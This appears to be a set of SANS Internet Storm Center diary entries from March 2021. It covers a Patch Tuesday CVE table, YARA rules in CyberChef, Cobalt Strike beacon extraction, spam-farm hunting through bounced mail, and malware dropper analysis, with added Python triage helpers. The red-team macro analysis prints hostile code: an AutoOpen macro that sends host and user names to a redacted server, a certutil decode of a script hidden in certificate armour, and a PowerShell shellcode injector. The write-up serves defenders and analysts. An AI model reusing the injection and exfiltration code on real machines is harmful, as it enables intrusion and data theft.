HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-27050 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-27051 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-27061 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8
HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2021-27062 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Internet Explorer Memory Corruption Vulnerability | CVE-2021-26411 | Yes | Yes | Detected | Detected | Critical | 8.8 | 7.9
Internet Explorer Remote Code Execution Vulnerability | CVE-2021-27085 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.9
Microsoft Excel Remote Code Execution Vulnerability | CVE-2021-27053 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Excel Remote Code Execution Vulnerability | CVE-2021-27054 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-26412 | No | No | Less Likely | Less Likely | Critical | 9.1 | 8.2
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-26854 | No | No | Less Likely | Less Likely | Important | 6.6 | 5.8
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-26855 | No | Yes | Detected | Detected | Critical | 9.1 | 8.4
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-26857 | No | Yes | More Likely | Detected | Critical | 7.8 | 7.2
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-26858 | No | Yes | Detected | Detected | Important | 7.8 | 7.2
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-27065 | No | Yes | Detected | Detected | Critical | 7.8 | 7.2
Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-27078 | No | No | Less Likely | Less Likely | Important | 9.1 | 8.2
Microsoft Office ClickToRun Remote Code Execution Vulnerability | CVE-2021-27058 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Office Remote Code Execution Vulnerability | CVE-2021-24108 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Office Remote Code Execution Vulnerability | CVE-2021-27057 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Office Remote Code Execution Vulnerability | CVE-2021-27059 | No | No | Less Likely | Less Likely | Important | 7.6 | 6.6
Microsoft Power BI Information Disclosure Vulnerability | CVE-2021-26859 | No | No | Less Likely | Less Likely | Important | 7.7 | 6.7
Microsoft PowerPoint Remote Code Execution Vulnerability | CVE-2021-27056 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft SharePoint Server Information Disclosure Vulnerability | CVE-2021-27052 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8
Microsoft SharePoint Server Remote Code Execution Vulnerability | CVE-2021-27076 | No | No | More Likely | More Likely | Important | 8.8 | 7.7
Microsoft SharePoint Spoofing Vulnerability | CVE-2021-24104 | No | No | Less Likely | Less Likely | Important | 4.6 | 4.2
Microsoft Visio Security Feature Bypass Vulnerability | CVE-2021-27055 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1
Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | CVE-2021-26887 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Windows Media Foundation Remote Code Execution Vulnerability | CVE-2021-26881 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
OpenType Font Parsing Remote Code Execution Vulnerability | CVE-2021-26876 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | CVE-2021-27082 | No | No | - | - | Important | 7.8 | 6.8
Remote Access API Elevation of Privilege Vulnerability | CVE-2021-26882 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | CVE-2021-27083 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Storage Spaces Controller Elevation of Privilege Vulnerability | CVE-2021-26880 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
User Profile Service Denial of Service Vulnerability | CVE-2021-26886 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | CVE-2021-27081 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | CVE-2021-27084 | No | No | Less Likely | Less Likely | Important | | 
Visual Studio Code Remote Code Execution Vulnerability | CVE-2021-27060 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows 10 Update Assistant Elevation of Privilege Vulnerability | CVE-2021-27070 | No | No | Less Likely | Less Likely | Important | 7.3 | 6.4
Windows ActiveX Installer Service Information Disclosure Vulnerability | CVE-2021-26869 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Admin Center Security Feature Bypass Vulnerability | CVE-2021-27066 | No | No | Less Likely | Less Likely | Important | 4.3 | 3.8
Windows App-V Overlay Filter Elevation of Privilege Vulnerability | CVE-2021-26860 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Container Execution Agent Elevation of Privilege Vulnerability | CVE-2021-26865 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
Windows Container Execution Agent Elevation of Privilege Vulnerability | CVE-2021-26891 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows DNS Server Denial of Service Vulnerability | CVE-2021-26896 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows DNS Server Denial of Service Vulnerability | CVE-2021-27063 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows DNS Server Remote Code Execution Vulnerability | CVE-2021-26877 | No | No | More Likely | More Likely | Important | 9.8 | 8.5
Windows DNS Server Remote Code Execution Vulnerability | CVE-2021-26893 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.5
Windows DNS Server Remote Code Execution Vulnerability | CVE-2021-26894 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.5
Windows DNS Server Remote Code Execution Vulnerability | CVE-2021-26895 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.5
Windows DNS Server Remote Code Execution Vulnerability | CVE-2021-26897 | No | No | More Likely | More Likely | Critical | 9.8 | 8.5
Windows Error Reporting Elevation of Privilege Vulnerability | CVE-2021-24090 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Event Tracing Elevation of Privilege Vulnerability | CVE-2021-26872 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Event Tracing Elevation of Privilege Vulnerability | CVE-2021-26898 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Event Tracing Elevation of Privilege Vulnerability | CVE-2021-26901 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Event Tracing Information Disclosure Vulnerability | CVE-2021-24107 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | CVE-2021-26892 | No | No | Less Likely | Less Likely | Important | 6.2 | 5.6
Windows Graphics Component Elevation of Privilege Vulnerability | CVE-2021-26868 | No | No | More Likely | More Likely | Important | 7.8 | 6.8
Windows Graphics Component Remote Code Execution Vulnerability | CVE-2021-26861 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Hyper-V Remote Code Execution Vulnerability | CVE-2021-26867 | No | No | Less Likely | Less Likely | Critical | 9.9 | 8.6
Windows Installer Elevation of Privilege Vulnerability | CVE-2021-26862 | No | No | Less Likely | Less Likely | Important | 6.3 | 5.5
Windows Media Photo Codec Information Disclosure Vulnerability | CVE-2021-26884 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows NAT Denial of Service Vulnerability | CVE-2021-26879 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows Overlay Filter Elevation of Privilege Vulnerability | CVE-2021-26874 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Print Spooler Elevation of Privilege Vulnerability | CVE-2021-1640 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Print Spooler Elevation of Privilege Vulnerability | CVE-2021-26878 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Projected File System Elevation of Privilege Vulnerability | CVE-2021-26870 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows UPnP Device Host Elevation of Privilege Vulnerability | CVE-2021-26899 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Update Service Elevation of Privilege Vulnerability | CVE-2021-26866 | No | No | Less Likely | Less Likely | Important | 7.1 | 6.2
Windows Update Stack Elevation of Privilege Vulnerability | CVE-2021-26889 | No | No | Less Likely | Less Likely | Important | 7.1 | 6.2
Windows Update Stack Setup Elevation of Privilege Vulnerability | CVE-2021-1729 | No | No | Less Likely | Less Likely | Important | 7.1 | 6.2
Windows User Profile Service Elevation of Privilege Vulnerability | CVE-2021-26873 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1
Windows Virtual Registry Provider Elevation of Privilege Vulnerability | CVE-2021-26864 | No | No | Less Likely | Less Likely | Important | 8.4 | 7.3
Windows WalletService Elevation of Privilege Vulnerability | CVE-2021-26871 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows WalletService Elevation of Privilege Vulnerability | CVE-2021-26885 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Win32k Elevation of Privilege Vulnerability | CVE-2021-27077 | Yes | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Windows Win32k Elevation of Privilege Vulnerability | CVE-2021-26863 | No | No | More Likely | More Likely | Important | 7.0 | 6.1
Windows Win32k Elevation of Privilege Vulnerability | CVE-2021-26875 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Win32k Elevation of Privilege Vulnerability | CVE-2021-26900 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

9 March 2021

ISC Stormcast For Tuesday, March 9th, 2021 https://isc.sans.edu/podcastdetail.html?id=7404, (Tue, Mar 9th)

8 March 2021

YARA and CyberChef, (Mon, Mar 8th)

If you prefer a graphical user interface to match YARA rules, you can try CyberChef.

YARA is a pattern matching tool, known as "The pattern matching Swiss knife".

CyberChef is a web app for all kinds of (file) analysis techniques, known as "The Cyber Swiss Army Knife".

And what do you get when you combine two Swiss Army knives? One really big Swiss Army knife :-)

CyberChef supports YARA rules.

Here I added one YARA rule to detect Office files with VBA macros. More precisely: OLE files (magic D0 CF 11 E0 at offset 0) that contain the start of the compressed default VBA source code header. A VBA module stream starts with "Attribute VB_Name", and the MS-OVBA compression inserts a flag byte after the first eight literal bytes, which is why the rule looks for "Attribut\x00e".

YARA rules that match the input (a Word document, .doc,  with VBA code in this example) are listed in the output.

Since CyberChef also has an unzip function, you can apply YARA rules to the files contained in a ZIP file (something the YARA tool itself cannot do):

If you want to copy the recipes, they are below.

Just YARA:

https://gchq.github.io/CyberChef/#recipe=YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)

UNZIP + YARA:

https://gchq.github.io/CyberChef/#recipe=Unzip('',false)YARA_Rules('rule%20ole_vba%20%7B%5Cn%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)
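The rule hidden in those recipe URLs, recovered from the URL encoding, and the same check (OLE magic at offset 0 plus the compressed VBA header marker) applied directly or to every member of a ZIP, as CyberChef's Unzip + YARA_Rules chain does. This is an added example, not the diary's code; the sample OLE files and the ZIP are constructed stand-ins.

```python
import io
import re
import struct
import urllib.parse
import zipfile

# "Just YARA" recipe URL from the diary; the rule text is the first argument of YARA_Rules.
RECIPE_URL = ("https://gchq.github.io/CyberChef/#recipe=YARA_Rules('rule%20ole_vba%20%7B%5Cn"
              "%20%20%20%20strings:%5Cn%20%20%20%20%20%20%20%20$a%20%3D%20%22Attribut%5C%5Cx00e"
              "%22%5Cn%20%20%20%20condition:%5Cn%20%20%20%20%20%20%20%20$a%20and%20uint32be(0)"
              "%20%3D%3D%200xd0cf11e0%5Cn%7D',false,false,false,false)")

OLE_MAGIC = 0xD0CF11E0          # uint32be(0) of an OLE compound file (D0 CF 11 E0 A1 B1 1A E1)
VBA_MARKER = b"Attribut\x00e"   # start of the compressed "Attribute VB_Name" header


def rule_from_recipe(url):
    # CyberChef URL-encodes recipe arguments; inside the quotes a newline is written
    # as backslash-n and a literal backslash as a doubled backslash.
    decoded = urllib.parse.unquote(url.split("#recipe=", 1)[1])
    m = re.search(r"YARA_Rules\('((?:[^'\\]|\\.)*)'", decoded)
    if not m:
        return None
    return m.group(1).encode("ascii").decode("unicode_escape")


def matches_ole_vba(data):
    # Python equivalent of the rule: OLE magic at offset 0 and the VBA marker anywhere.
    if len(data) < 4:
        return False
    return struct.unpack(">I", data[:4])[0] == OLE_MAGIC and VBA_MARKER in data


def scan_like_cyberchef(data):
    # Mirrors the Unzip + YARA_Rules recipe: if the input is a ZIP, test each member;
    # otherwise test the input itself. Returns {name: matched}.
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return {name: matches_ole_vba(zf.read(name)) for name in zf.namelist()}
    return {"<input>": matches_ole_vba(data)}


def build_sample_ole(with_vba):
    # Constructed stand-in for an OLE file: real 8-byte magic, a padded header sector and,
    # optionally, the VBA marker as it appears at the start of a compressed VBA stream.
    body = b"\x00" * 504
    if with_vba:
        body += b"\x00" * 16 + VBA_MARKER + b' VB_Name = "ThisDocument"'
    return struct.pack(">I", OLE_MAGIC) + b"\xa1\xb1\x1a\xe1" + body


def build_sample_zip():
    # Constructed archive mixing a macro document, a clean one and a non-OLE file.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("macro.doc", build_sample_ole(True))
        zf.writestr("clean.doc", build_sample_ole(False))
        zf.writestr("readme.txt", b"not an OLE file")
    return buf.getvalue()


if __name__ == "__main__":
    print(rule_from_recipe(RECIPE_URL))
    print(scan_like_cyberchef(build_sample_zip()))
```

Note that a .docm is itself a ZIP whose vbaProject.bin member is an OLE container, so the ZIP path of this check also covers modern Office formats.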

And now I need to close my tabs and let the browser update itself :-) .


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

8 March 2021

ISC Stormcast For Monday, March 8th, 2021 https://isc.sans.edu/podcastdetail.html?id=7402, (Mon, Mar 8th)

7 March 2021

PCAPs and Beacons, (Sun, Mar 7th)

I like taking a closer look at capture files posted by Brad. In his latest diary entry, we have a capture file with Cobalt Strike traffic.

With regular expression "^/....$" I look for URIs that are typical for Cobalt Strike shellcode (and Metasploit too):

Following this HTTP stream, I see data that looks encoded and has some repetitions, so this might be some kind of XOR encoding:

I export this data stream as a file:

Then pass it through my 1768.py Cobalt Strike beacon analysis tool:

And this is indeed the configuration of a beacon.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

6 March 2021

Spotting the Red Team on VirusTotal!, (Sat, Mar 6th)

Many security researchers like to use the VirusTotal platform. The provided services are amazing: you can immediately get a clear overview of how dangerous a file is, but... VirusTotal remains a cloud service. It means that, once you have uploaded a file to scan it, you have to consider it as "lost" and available to a lot of (good or bad) people! In the SANS FOR610 training ("Reverse Engineering Malware"), we insist on the fact that you should avoid uploading a file to VT! The best practice is to compute the file hash and then search for it, to see if someone else has already uploaded the same sample. If you're the first to upload a file, its creator can be notified about the upload and learn that he has been detected. Don't be fooled: attackers also have access to VirusTotal and monitor activity around their malware! Note that I mention VirusTotal because it is very popular, but it is not the only service providing repositories of malicious files; there are plenty of alternative services to scan and store malicious files.

Another way to use those online services is to "hunt". That's what I'm doing with most of the samples that I analyze in my diaries. If you are working on the defensive side (or in a Blue team), my advice is to keep an eye on data related to your business or organization via OSINT sources. Sometimes, you can find interesting information and stay one step ahead of the attacker or... the Red team you hired to test your infrastructure!

I spotted a nice VBS macro that seems to be related to a Red team exercise. I won't disclose the hash and the script here because they contain sensitive information:

  • URLs with the domain of the company performing the security assessment
  • Public IP addresses used for reverse shells
  • Internal resources about the targeted infrastructure (apparently, the reconnaissance phase was already completed)

Here are some pieces of interesting code:

The entry point of the macro already discloses some fun:

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    'php rev shell and others...
    Document_Open2
    ...

Let's start with some data sent back to the attacker:

Private Sub Document_Open2()
    On Error Resume Next
    uID = Environ("COMPUTERNAME") & "B3" & Environ("USERNAME")
    SavePath = Environ("TEMP") & "\tempB2" & Int((9999 - 1000 + 1) * Rnd + 1000)
    CanSend = 0
    sendSystemInfo "http://www.xxxxxxxx.com/sp/index.php?id=" & uID, CanSend
    openShell
End Sub

The domain used in the URL (obfuscated) is the domain of the security company performing the tests!

They obfuscate a script in a fake certificate and decode it with certutil.exe (a classic TTP):

x = x & "-----BEGIN CERTIFICATE-----"
x = x & "JGxpbmVzID0gaXBjb25maWcgI3NhdmUgb3V0cHV0IG9mIGNvbW1hbmQgdG8gdmFy"
x = x & "aWFibGUgJGxpbmVzDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQg"
x = x & "aG9zdG5hbWUpDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQgc2hh"
[...Data removed...]
x = x & "ICRsaW5lICsgIi5pbG10LnVzIg0KICAgICRhcnJheSA9ICRhcnJheSArICRsaW5l"
x = x & "ICNhZGQgdGhlIHZhbHVlIHRvIG91ciBhcnJheQ0KfQ0KDQpmb3IgKCRpID0gMDsg"
x = x & "JGkgLWx0ICRhcnJheS5sZW5ndGg7ICRpKyspIHsNCiAgICBwaW5nICRhcnJheVsk"
x = x & "aV0NCn0="
x = x & "-----END CERTIFICATE-----"
objFile.Write x & vbCrLf
objFile.Close
Shell ("cmd /k certutil -decode " & outFile & " " & inFile), vbHide
Shell (Final & inFile), vbHide
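A triage helper for this TTP, added here and not part of the diary: it rebuilds the string a macro accumulates with repeated `x = x & "..."` statements, base64-decodes what sits between the certificate armor lines exactly as certutil -decode would, and reports whether the result starts like a DER X.509 certificate or is really printable script text. The macro and the script inside it are constructed samples.

```python
import base64
import binascii
import re
import string

PEM_BLOCK = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def reassemble_vba_string(vba_source, var="x"):
    # Rebuild the value built by consecutive `var = var & "..."` lines (one per statement).
    pat = re.compile(r'^\s*%s\s*=\s*%s\s*&\s*"((?:[^"]|"")*)"' % (re.escape(var), re.escape(var)), re.M)
    return "\n".join(s.replace('""', '"') for s in pat.findall(vba_source))


def decode_certificate_block(text):
    # certutil -decode ignores the armor lines and base64-decodes everything between them.
    m = PEM_BLOCK.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
    except binascii.Error:
        return None


def classify_certificate_block(text):
    # 'der'    : starts with an ASN.1 SEQUENCE with long-form length, as real certificates do
    # 'text'   : almost entirely printable, i.e. a script smuggled inside certificate armor
    # 'binary' : neither (also worth a look)
    # None     : no decodable BEGIN/END CERTIFICATE block
    raw = decode_certificate_block(text)
    if not raw:
        return None
    if raw[:2] in (b"\x30\x82", b"\x30\x83"):
        return "der"
    printable = sum(ch in string.printable for ch in raw.decode("latin-1"))
    return "text" if printable / len(raw) >= 0.95 else "binary"


def armor(raw):
    # Wrap bytes in certificate armor at 64 columns; used only to build the samples below.
    b64 = base64.b64encode(raw).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


# Constructed stand-in for the smuggled script (the diary's decoded content is not reproduced).
FAKE_SCRIPT = (b"$lines = ipconfig  # constructed sample script\r\n"
               b"$lines = $lines + (cmd.exe /c net hostname)\r\n")

# Constructed macro fragment in the same `x = x & "..."` layout as the snippet above.
SAMPLE_VBA = "\n".join('x = x & "%s"' % line for line in armor(FAKE_SCRIPT).splitlines())

# Constructed DER-like blob: SEQUENCE tag, long-form length, then filler.
DER_LIKE = b"\x30\x82\x01\x00" + bytes(256)


if __name__ == "__main__":
    blob = reassemble_vba_string(SAMPLE_VBA)
    print(classify_certificate_block(blob))          # text
    print(decode_certificate_block(blob).decode())   # the smuggled script
```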

The next technique implemented is the exfiltration of data via HTTPS. They perform this with shellcode injected into a PowerShell thread:

$1 = '$c = ''
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';
$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$z = 0xbe,0x57,0xed,0x7b,0x36,0xda, [...Data Removed...],0x2e,0xd9,0x1b,0x87,0xf2;
$g = 0x1000;
if ($z.Length -gt 0x1000) { $g = $z.Length };
$x=$w::VirtualAlloc(0,0x1000,$g,0x40);
for ($i=0;$i -le ($z.Length-1);$i++) { $w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1) };
$w::CreateThread(0,0,$x,0,0,0);
for (;;) { Start-sleep 60 };';
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));
$2 = "-enc ";
if([IntPtr]::Size -eq 8) {
    $3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";
    iex "& $3 $2 $e"
} else {;
    iex "& powershell $2 $e";
}

Here is the shellcode:

The injected shellcode connects to a Comcast public IP address that, when accessed manually, implements a redirect to... the website of the company :-)

remnux@remnux:/MalwareZoo/20210305$ curl http://x.x.x.x
<script>
window.location.href = "https://xxxxxxxx.com";
</script>

To conclude:

  • If you're a defender, I hope this example demonstrates to you the importance of implementing OSINT techniques to spot attackers and learn what can be in the pipe.
  • If you're an attacker, well, do not use your corporate domain! Cover your tracks as much as possible and don't upload your scripts on VirusTotal.

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

5 March 2021

ISC Stormcast For Friday, March 5th, 2021 https://isc.sans.edu/podcastdetail.html?id=7400, (Fri, Mar 5th)

5 March 2021

Spam Farm Spotted in the Wild, (Fri, Mar 5th)

If there is a place where you can always find juicy information, it's your spam folder! Yes, I like spam and I don't delete my spam before having a look at it for hunting purposes. Besides emails flagged as spam, NDR or "Non-Delivery Receipt" messages also deserve some attention. One of our readers (thanks to him!) reported yesterday how he found a "spam farm" based on bounced emails. By default, SMTP is a completely open protocol. Everybody can send an email pretending to be Elon Musk or Joe Biden! That's why security controls like SPF[1] or DKIM[2] can be implemented to prevent spoofed emails from being sent from anywhere. If these controls are not implemented, you may be the victim of spam campaigns that abuse your domain name or identity. The "good" point (if we can say this) is that all NDR messages will bounce to the official mail server that you manage. That's what happened to our reader: he saw many bounced messages for unknown email addresses. Here is an example:

--1614779618-eximdsn-513689040
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed:

  [victim]@[victimdomain]
    host [victimmx]
    SMTP error from remote mail server after end of data:
    550 5.2.0 Mail rejete. Mail rejected. ************

--1614779618-eximdsn-513689040
Content-type: message/delivery-status

Reporting-MTA: dns; fjimkopo[.]com
Action: failed
Final-Recipient: rfc822;[victim]@[victimdomain]
Status: 5.0.0
Remote-MTA: dns; [victimmx]
Diagnostic-Code: smtp; 550 5.2.0 Mail rejete. Mail rejected. ***********

--1614779618-eximdsn-513689040
Content-type: message/rfc822

Return-path: <[ourmailbox]@[ourdomain]>
Received: from admin by fjimkopo[.]com with local (Exim 4.86_2)
	(envelope-from [ourmailbox]@[ourdomain])
	id 1lHQYA-0002y9-UD
	for [victim]@[victimdomain]; Wed, 03 Mar 2021 12:24:22 +0000
To: [victim]@[victimdomain]
Subject: *****************
X-PHP-Originating-Script: 1000:mailer1.php
Date: Wed, 3 Mar 2021 12:24:22 +0000
From: ***************** [ourmailbox]@[ourdomain]>
Reply-To: oev4228@outlook[.]com
Message-ID: <1e0b99b15ab141dc32cdf034e0bee3d4@farments[.]cf>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

What interesting information do we have in this email? We see a domain name: farments[.]cf in the Message-ID (this header is generated by the first hop in the SMTP delivery chain) but also another SMTP header added by the mailer: X-PHP-Originating-Script: 1000:mailer1.php.

Let's combine the domain with the URL in the header: hxxp://farments[.]cf/mailer1.php
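The same extraction done programmatically, as an added example that is not the diary's code: walk a multipart/report bounce with Python's email module, find the embedded message/rfc822 part, and pull the Message-ID domain and the X-PHP-Originating-Script header into a defanged candidate URL. The NDR below is a constructed sample modelled on the bounce quoted above; the outer report headers are assumed.

```python
import email
import re

# Constructed NDR: outer multipart/report wrapper (assumed) around the bounced message,
# with the defanged placeholder values used in the diary.
SAMPLE_NDR = """\
Return-path: <>
From: [bounce-sender]@fjimkopo[.]com
To: [ourmailbox]@[ourdomain]
Subject: Mail delivery failed: returning message to sender
Content-Type: multipart/report; report-type=delivery-status; boundary=1614779618-eximdsn-513689040

--1614779618-eximdsn-513689040
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.
The following address(es) failed: [victim]@[victimdomain]

--1614779618-eximdsn-513689040
Content-type: message/delivery-status

Reporting-MTA: dns; fjimkopo[.]com
Action: failed
Final-Recipient: rfc822;[victim]@[victimdomain]
Status: 5.0.0

--1614779618-eximdsn-513689040
Content-type: message/rfc822

Return-path: <[ourmailbox]@[ourdomain]>
Received: from admin by fjimkopo[.]com with local (Exim 4.86_2)
To: [victim]@[victimdomain]
Subject: *****************
X-PHP-Originating-Script: 1000:mailer1.php
Date: Wed, 3 Mar 2021 12:24:22 +0000
From: ***************** <[ourmailbox]@[ourdomain]>
Reply-To: oev4228@outlook[.]com
Message-ID: <1e0b99b15ab141dc32cdf034e0bee3d4@farments[.]cf>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1

(spam body removed)
--1614779618-eximdsn-513689040--
"""


def extract_mailer_indicators(ndr_text):
    # The Message-ID is set by the first hop, so its domain points at the sending host;
    # X-PHP-Originating-Script (uid:script) names the PHP file that called mail().
    msg = email.message_from_string(ndr_text)
    for part in msg.walk():
        if part.get_content_type() != "message/rfc822":
            continue
        inner = part.get_payload()[0]          # the bounced original message
        msgid = inner.get("Message-ID", "")
        m = re.search(r"@([^>\s]+)>?\s*$", msgid)
        domain = m.group(1) if m else None
        script_hdr = inner.get("X-PHP-Originating-Script")
        script = script_hdr.split(":", 1)[-1].strip() if script_hdr else None
        return {
            "message_id_domain": domain,
            "php_script": script,
            # hxxp:// keeps the pivot URL defanged, as in the diary
            "candidate_url": f"hxxp://{domain}/{script}" if domain and script else None,
            "reply_to": inner.get("Reply-To"),
        }
    return None


if __name__ == "__main__":
    print(extract_mailer_indicators(SAMPLE_NDR))
```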

This is a leafmailer[3] instance, a very popular PHP mailer used by spammers. urlscan.io reports 26 similar websites[4]:

I did the same search on VirusTotal and found more URLs:


Many of them are compromised websites where the mailer is deployed and used to send spam.

Conclusion: Keep an eye on your bounced messages, sometimes they may reveal interesting information!

[1] https://en.wikipedia.org/wiki/Sender_Policy_Framework
[2] https://en.wikipedia.org/wiki/DomainKeys_Identified_Mail
[3] https://leafmailer.pw
[4] https://urlscan.io/result/3289f4f9-6db2-46e8-b72b-fa3b1561bdf6/related/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

4 March 2021

From VBS, PowerShell, C Sharp, Process Hollowing to RAT, (Thu, Mar 4th)

VBS files are an interesting way to deliver malicious content to a victim's computer because they look like simple text files. I found an interesting sample that behaves like a dropper. But it also looks like a Russian doll, given all the techniques used to drop a RAT at the end. The file hash is 8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead and it has a VT score of 12/59[1]. It was delivered by email under the name "Procurement - Attached RFQ 202102.vbs". If you filter attachments based on the MIME type, this file won't be detected as suspicious:

remnux@remnux:/MalwareZoo/20210303$ file *.vbs
Procurement - Attached RFQ 202102.vbs: ASCII text, with very long lines, with CRLF line terminators

When you try to open a .vbs file on a standard Windows system, it is processed by the "Microsoft ® Windows Based Script Host" handlers. Here is the code executed when you open this script:

Private Function vQ(Inp, Key, Mode)
    Dim z, i, Position, cptZahl, orgZahl, keyZahl, cptString
    For i = 1 To lEn(Inp)
        Position = Position + 1
        If Position > lEn(Key) Then Position = 1
        keyZahl = aSc(Mid(Key, Position, 1))
        If Mode Then
            ' encode: XOR each character with the key and emit it as two hex digits
            orgZahl = aSc(Mid(Inp, i, 1))
            cptZahl = orgZahl Xor keyZahl
            cptString = hEx(cptZahl)
            If lEn(cptString) < 2 Then cptString = "0" & cptString
            z = z & cptString
        Else
            ' decode: read two hex digits at a time and XOR them with the key
